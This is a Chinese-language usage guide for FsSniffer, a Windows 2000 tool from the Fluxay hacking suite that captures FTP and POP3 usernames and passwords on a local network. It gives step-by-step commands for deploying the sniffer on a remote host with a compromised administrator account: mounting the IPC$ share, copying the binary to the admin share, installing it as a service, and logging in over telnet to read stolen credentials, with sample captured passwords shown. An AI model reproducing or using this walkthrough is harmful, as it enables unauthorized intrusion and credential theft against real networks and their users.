FsSniffer只能在Windows 2000中使用，可以捕捉到本機和基于非交換環(huán)境局域網(wǎng)的POP3/FTP用戶名和密碼。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP：指綁定的IP地址，通常就是本地主機IP地址。Port：控制的端口，以后要通過這個端口登陸上去查看結果。Control Password：登陸時的密碼。登陸上去后的命令Show Result：查看捕獲的記錄Quit：退出ShutDown：結束Sniffer的運行二、遠程使用例如：得到主機211.152.188.1的一個屬于管理員組的帳號test:test，首先登錄。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.將fssniffer.exe復制到遠程主機。(也可以用流光IV中提供的工具“種植者”來做這件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied.　利用流光IV中的NTCMD啟動FsSniffer.EXE，并將器安裝成為服務=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 這樣在遠程主機上面安裝了一個服務ShadowSniffer。用net命令啟動服務NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安裝成為服務的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:遠程主機的用戶名（必須具有超級用戶權限)Passwod:遠程主機的密碼Service Name:安裝的服務名稱，如果安裝失敗，可以將FsSniffer.exe改名再試。Bind Local IP:遠程主機的IP。某些主機具有兩個IP地址，這是就需要根據(jù)需要選擇監(jiān)聽的IP地址(例如：局域網(wǎng)和外網(wǎng))Port:遠程控制的端口Control Password:遠程控制的密碼過一段時間就可以登陸到FsSniffer開的端口7上面，查看結果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕軟件實驗室&#8482; 1995-2001版權所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com